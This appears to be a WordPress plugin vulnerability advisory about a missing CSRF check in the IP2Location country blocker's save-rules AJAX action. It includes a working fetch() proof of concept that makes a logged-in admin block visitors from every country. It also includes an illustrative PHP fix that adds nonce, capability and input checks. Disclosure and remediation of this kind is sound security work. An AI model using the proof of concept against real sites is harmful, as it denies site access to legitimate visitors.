The plugin does not perform a CSRF check in the ip2location_country_blocker_save_rules AJAX action, allowing attackers to make a logged-in admin block an arbitrary country, or block all of them at once, preventing users from accessing the frontend.
Make an admin open a page with the following code in it, which will ban visitors from all countries:

    fetch("https://example.com/wp-admin/admin-ajax.php", {
        "headers": {
            "content-type": "application/x-www-form-urlencoded",
        },
        "body": new URLSearchParams({
            "action": "ip2location_country_blocker_save_rules",
            "countries[]": "nonexistent",
            "mode": 0
        }),
        "method": "POST",
        "credentials": "include"
    })
    .then(response => response.text())
    .then(function(data) { console.log(data); });
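The missing control is a nonce check in the AJAX handler. The following is an added example, not the plugin's own code, of how a WordPress admin AJAX "save rules" action is normally protected: the settings page hands its script a nonce bound to the action, and the handler rejects any request that does not carry it, then additionally checks capability and validates the submitted country codes. The hook name, script handle, option name, field names and the meaning of `mode` are assumptions made for illustration.

```php
<?php
/**
 * Added example (not the plugin's own code): a hardened admin AJAX
 * "save rules" handler showing the CSRF nonce check and capability
 * check that the vulnerable action lacked. All names are assumed.
 */

// 1. When enqueuing the admin settings script, hand it a nonce tied to
//    this specific action. Only a page rendered by WordPress for this
//    logged-in user can obtain the value; a page on another origin cannot.
add_action( 'admin_enqueue_scripts', function ( $hook ) {
    // Assumed script handle and path for the plugin's settings page.
    wp_enqueue_script( 'example-blocker-admin', plugins_url( 'admin.js', __FILE__ ), array(), '1.0', true );
    wp_localize_script( 'example-blocker-admin', 'exampleBlocker', array(
        'ajaxUrl' => admin_url( 'admin-ajax.php' ),
        'nonce'   => wp_create_nonce( 'example_blocker_save_rules' ),
    ) );
} );

// 2. Register the handler for logged-in users only (wp_ajax_, never wp_ajax_nopriv_).
add_action( 'wp_ajax_example_blocker_save_rules', 'example_blocker_save_rules' );

function example_blocker_save_rules() {
    // CSRF protection: the request must carry a valid nonce for this action.
    // check_ajax_referer() ends the request with a -1 response when the nonce
    // is missing or stale, which is what a cross-site fetch() will receive.
    check_ajax_referer( 'example_blocker_save_rules', 'nonce' );

    // Authorization: being logged in is not enough; editing site-wide
    // blocking rules warrants the manage_options capability.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'Insufficient permissions.' ), 403 );
    }

    // Input validation: accept only two-letter country codes so a value such
    // as "nonexistent" never reaches the rule store.
    $raw_countries = isset( $_POST['countries'] ) ? (array) wp_unslash( $_POST['countries'] ) : array();
    $countries     = array();
    foreach ( $raw_countries as $code ) {
        $code = strtoupper( sanitize_text_field( $code ) );
        if ( preg_match( '/^[A-Z]{2}$/', $code ) ) {
            $countries[] = $code;
        }
    }
    if ( count( $countries ) !== count( $raw_countries ) ) {
        wp_send_json_error( array( 'message' => 'Invalid country code supplied.' ), 400 );
    }

    // Assumed enum for this illustration: 0 = block listed, 1 = allow only listed.
    $mode = isset( $_POST['mode'] ) ? absint( $_POST['mode'] ) : 0;
    if ( ! in_array( $mode, array( 0, 1 ), true ) ) {
        wp_send_json_error( array( 'message' => 'Invalid mode.' ), 400 );
    }

    // Assumed option name for the stored rules.
    update_option( 'example_blocker_rules', array( 'countries' => $countries, 'mode' => $mode ) );
    wp_send_json_success( array( 'countries' => $countries, 'mode' => $mode ) );
}
```

The legitimate settings page script then includes `nonce: exampleBlocker.nonce` in its POST body alongside `action`, `countries[]` and `mode`. Because the nonce is generated per user and per action and is never exposed to other origins, a request shaped like the proof of concept above arrives without it and is refused before any rule is written; the capability check covers the separate case of a low-privilege logged-in user, and the code validation bounds what an authorised request can store.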
Krzysztof Zając
Krzysztof Zając
Yes
2022-01-06
2022-01-06
2022-04-08